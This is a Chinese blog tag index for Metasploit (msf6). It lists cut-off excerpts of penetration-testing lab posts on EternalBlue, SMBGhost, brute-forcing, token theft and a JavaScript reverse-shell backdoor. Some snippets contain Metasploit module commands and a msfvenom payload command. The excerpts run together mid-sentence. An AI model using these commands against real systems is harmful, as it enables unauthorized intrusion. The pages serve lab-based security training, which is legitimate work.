首页 > TAG信息列表 > msf6
msf基础
msf中的模块: exploits,auxiliary,post,payloads,encoders,nops,evasionexploits:漏洞渗透模块。绝大多数人在发现漏洞之后,往往不知道接下来如何利用这个漏洞。漏洞模块本身就是解决这个文件的,每个模块对应一个漏洞,在发现目标的漏洞之后,无需知道漏洞是如何参生的,甚至无需掌握编程技术,vnc_none_auth(CVE-2006-2369)
msf6 > search vnc_none_auth Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxJavaScript后门创建与使⽤
JavaScript后门创建与使⽤ 前言 今天介绍一种小众的js后门获取shell,使用ps1encode来加密反弹后门。 工具地址:https://github.com/CroweCybersecurity/ps1encode 正文 在文件目录下用下面的命令生成反弹shell的js代码,填入监听机的ip和port ./ps1encode.rb --LHOST利用MSF渗透windows系统,windows数据库,linux系统实验
实验环境: kali:172.16.12.30 windows靶机:172.16.12.4 用户名:administrator 密码:vgrant centos靶机:172.16.12.11 用户名:root 密码:123 实验步骤: 一、攻击LINUX服务器 1、扫描目标机获取哪些服务和端口开启 ┌──(root利用密码字典暴力破解渗透目标系统
实验名称:利用密码字典渗透目标系统 实验人:XX 实验日期:2021.9.23 实验目的:利用SMB、FTP渗透windows,利用SSH渗透centos 实验环境: kali:172.16.12.30 windows靶机:172.16.12.10 用户名:administrator 密码:c!112233 centos靶机:172.16.12.11 用户名:root 密码:123 实验步骤: 一、利用SMB远Windows7令牌窃取
令牌(token) 访问令牌(Access Token):表示访问控制操作主体的系统对象 会话令牌(Session Token):是交互会话中唯一的身份标识符。 密保令牌(Security Token):又叫做认证令牌或硬件令牌,是一种计算机身份校验的物理设备,例如U盾 Delegation Token:也就是授权令牌,它支持交互式登录(例如可以Vulhub-DC-4靶场
Vulhub-DC-4靶场 前言 这套靶场的亮点在于对hydra的运用比较多,在遇到大容量字典的时候,BurpSuite可能会因为设置的运行内存的限制,导致字典需要花很长时间导入进去,虽然通过修改配置文件可以解决这点,但是总没有Hydra爆破工具来的更加友好。 通过本篇博客着重学习以下三点: 1.Hydra永恒之蓝-smb_ms17_010漏洞测试
kali主机:10.158.1.110 windows7 pro:10.158.1.120 注:未打补丁 msf6 > use auxiliary/scanner/smb/smb_ms17_010 msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue //调用攻击模块 msf6 exploit(windows/smb/ms17_010_etWIN10永恒之黑CVE-2020-0796漏洞复现获取getshell(未成功)可蓝屏
exploit:https://codechina.csdn.net/mirrors/chompie1337/SMBGhost_RCE_PoC?utm_source=csdn_github_accelerator 目标主机 把防火墙关了 关闭后可以ping通之后 连接反向木马 msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python 看到bumsf主机上线,钉钉通知你
参考:Metasploit主机上线钉钉通知 钉钉机器人Metasploit上线通知 写在前面,前面两个参考链接已经写的挺详细的了,但是我在实践过程中发现了一点小瑕疵,在这里罗嗦一下(其实就是msf版本问题导致的) 来一个钉钉机器人开启msf生成恶意文件准备msf钉钉通知 来一个钉钉机器人